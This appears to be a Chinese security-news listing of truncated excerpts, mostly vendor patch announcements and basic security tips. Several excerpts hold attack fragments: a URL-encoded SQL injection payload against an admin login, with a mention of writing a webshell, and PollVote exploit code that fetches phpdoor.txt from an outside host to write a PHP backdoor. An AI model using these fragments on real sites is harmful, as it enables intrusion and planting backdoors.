北京时间7月3日消息，据国外媒体报道，Google准备修复Google+信息转发功能中存在的一个隐私漏洞，Google同时还将着手过滤Google+的一些重复信息。 Google Buzz于2010年2月上线，但它暴露的隐私漏洞令舆论哗然，这最终迫使Google修复这些漏洞。 在全新的Google+社交网络中，Google采用了与Buzz相同的隐私功能，其中之一就是允许用户关闭Google+的信... [阅读全文]

下周二微软就要发布4月份安全补丁了，今天，微软放出了安全公告预告。4月份，微软将发布17个安全补丁，其中9个位最高的严重级别，另外8个为重要级别，修复 Windows、Office、IE、Visual Studio、.NET Framework和GDI+中的64个漏洞。 微软表示，4月份发布的补丁将修复在2月15日公开披露的SMB浏览器问题（严重等级漏洞）。微软评估并且报告了这个问题，尽管这个安... [阅读全文]

Oracle计划在1月18日发布一系列安全更新，覆盖了其企业软件系列中产生的66个漏洞。该公司在一份重要补丁更新预声明文件中称28种产品将接受安 全修复，包括Oracle数据库，Fusion Middleware，企业管理器，PeopleSoft CRM和电子商务套件。 与此同时，Oracle公司也为Sun产品，OpenOffice以及StarOffice产品套件提供安全修复。 在Oracle... [阅读全文]

北京时间1月18日，据国外媒体报道，Oracle计划在1月18日发布一系列安全更新，覆盖了其企业软件系列中产生的66个漏洞。该公司在一份重要补丁更新预声明文件中称28种产品将接受安全修复，包括Oracle数据库，Fusion Middleware，企业管理器，PeopleSoft CRM和电子商务套件。 与此同时，Oracle公司也为Sun产品，OpenOffice以及StarOffice产品套件... [阅读全文]

1月5日，360安全中心发布安全警报称，目前有少量互联网站存在“登录漏洞”，会导致其用户的帐号和密码在登录网站时泄露在网址中，存在一定安全风险。360安全专家石晓虹博士表示，这些网站的“登录漏洞”是因为采用了Http Get的方式在用户登录时进行身份验证，只要关闭这项登录方式，改用安全性更高的Http Post方式，就能修复网站的“登录漏洞”。 石晓虹博士打了个比方说：网站存在“登录漏洞”，就相当... [阅读全文]

【TechWeb消息】1月5日消息，360安全中心发布安全警报称，目前有少量互联网站存在“登录漏洞”，会导致其用户的帐号和密码在登录网站时泄露在网址中，存在一定安全风险。360安全专家石晓虹博士表示，这些网站的“登录漏洞”是因为采用了Http Get的方式在用户登录时进行身份验证，只要关闭这项登录方式，改用安全性更高的Http Post方式，就能修复... [阅读全文]

据金山发布的《2008年上半年中国电脑病毒及互联网安全报告》显示，漏洞已经成为电脑病毒传播的主要途径之一。据了解，微软本月发布的安全补丁多达11款，用来修复26个漏洞，创近两年补丁数量之最。虽然各大杀毒软件以及安全辅助软件都具备漏洞修复功能，然而由于广大用户对漏洞危害的认识不够，以及安全软件在漏洞修复过程中存在下载速度慢等问题，导致大量用户的电脑内存在安全漏洞，为电脑安全埋下隐患。 　　金山清理专... [阅读全文]

Internet开放性使得Web系统面临入侵攻击威胁而建立个安全Web系统直是人们目标个实用思路方法是建立比较容易实现相对安全系统同时按照定安全策略建立相应安全辅助系统漏洞扫描器就是这样类安全辅助系统　　漏洞扫描就是对计算机系统或者其他网络设备进行安全相关检测以找出安全隐患和可被黑客利用漏洞作为种保证Web信息系统和网络安全必不可少手段我们有必要仔细研究利用值得注意是漏洞扫描软件Software是... [阅读全文]

来源:安全中国实施修复思路方法有很多在这里介绍两种咱们使用第2种 思路方法1: Replace过滤 解决思路方法:查找login.asp下from找到下边类似 username=request.Form("name") pass=request.Form("pass") 修改为: username=Replace(request.Form("name"), "’",... [阅读全文]

文章来源:安全中国%3D%40%40%76%65%72%73%69%6F%6E%2B%61%6E%64%2B%27%27%3D%27&admininfo%5Flogpassword=4&admininfo%5Fadmin=1&admininfo%5Flogin=3&admininfo%5Floginname=1;") 后台写WEBSHELL 逻辑过滤方式: admin_up.asp 引用内容: ... [阅读全文]

user目录下Article.asp code:Dim ArticleTitle,AuthorName,CopyFrom,Editor,KeyWord,IsHot,IsTop,IsElite,yn,Content,ReadLevel,ReadPo,VIPReadPo,PaginationType,MaxCharPerPage,ClassID,IncludePic,IndexPicUrl,HitsD... [阅读全文]

这个不用我说了吧！他注入漏洞在马骏blog 上发过 个是 在:user目录下soft.asp 和 ShowInfo.asp 都有注入漏洞！我今天发现注入漏洞 也是在user目录下 RegPost.asp 文件出现漏洞！这个是注册页面！下面是code:dim rs,sql,MyUserInfo‘定义些变量dim UserName,UserPassWord,UserSex,UserQuestion,U... [阅读全文]

近段时间来360安全卫士出尽风头已经成为“装机必备”而且其版本更新非常频繁短短个星期的内更新多达6次以上!近日其1.7最新版本发布其中将给网民带来什么样惊喜呢?　　、键搞定所有系统安全漏洞　　从360安全卫士站点更新日志中我们发现V1.7新增了个“漏洞修复”功能下载并运行的后切换到“诊断及修复”标签这里多出了个“漏洞扫描”菜单　　点击该菜单瞬间这里列出了当前系统存在所有安全隐患并对其安全等级进行评... [阅读全文]

写本文目地是为了整理总结些东西解决在试图构造个漏洞数据库过程中碰到主要问题也就是如何对计算机网络漏洞进行分类问题文中些想法并不成熟有些甚至连自己也不满意权作抛砖引玉以期和在这方面有深入研究同仁交流共同提高完善 个计算机网络安全漏洞有它多方面属性我认为主要可以用以下几个方面来概括:漏洞可能造成直接威胁漏洞成因漏洞严重性漏洞被利用方式以下讨论将回绕这几个方面对漏洞细分其类 A．按漏洞可能对系统造成... [阅读全文]

转自:重庆网安联盟 公司有台安装在Windows 2000 Server上SQL Server 2000数据库服务器由于仅仅是作为数据库服务器用平时甚少登录桌面即使有登录为了更好安全性也都是用另个专门创建低权限账户进入桌面正因如此天长日久倒搞忘了本机管理员密码由于些原因这台服务器也没加入域所以也不能指望用域管理员账户登入但今天又必须用管理员用户登录进行些操作该如何办呢?以前也曾听过很多种... [阅读全文]

PollVote是个投票系统今天看了非安全杂志看了利用思路方法不过作者说利用过程时候很烦琐关键时候又没介绍说明白简单说下``首先建立2个文本 分别是creatfile.txt和phpdoor.txtcreatfile.txt内容写?$f=file_get_contents("http://www.hackeroo.com/phpdoor.txt");$ff=fopen("111.php","a")... [阅读全文]

PHP PHP = 5.1.4PHP PHP = 4.4.3　　　中存在多个安全漏洞具体如下:1) file_exists、imap_open和imap_reopen中缺少safe_mode和open_basedir验证；2) 在64位系统上str_repeat和wordwrap存在边界；3) 可通过cURL扩展和realpath缓存Cache绕过open_basedir和safe_mode保护... [阅读全文]

从Windows98开始共享就给很多上网用户带来无穷无尽烦恼但同时共享又是黑客攻击他人电脑把利器如何彻底禁止Windows 2000和Windows XP系统共享漏洞呢?下面我们来说说相关知识　　1、查看共享资源　　在Windows XP系统中电脑所有驱动器都默认为自动共享但不会显示共享手形标志这就给网络安全留下了隐患我们可以在"运行"栏中填入cmd进入命令提示符输入net share快速查看电脑... [阅读全文]

懂得网络人对于Ping这个最基本网络命令定很熟悉它是个非常好用TCP/IP工具它可以向你提供地址发送个小数据包然后侦听这台机器是否有“回答”你可以使用机器 Internet 地址如:ping 192.78.222.81或者也可使用机器名如:ping MyComputer 在使用Ping时Ping工具发送个ICMP(Internet Control Management Pr... [阅读全文]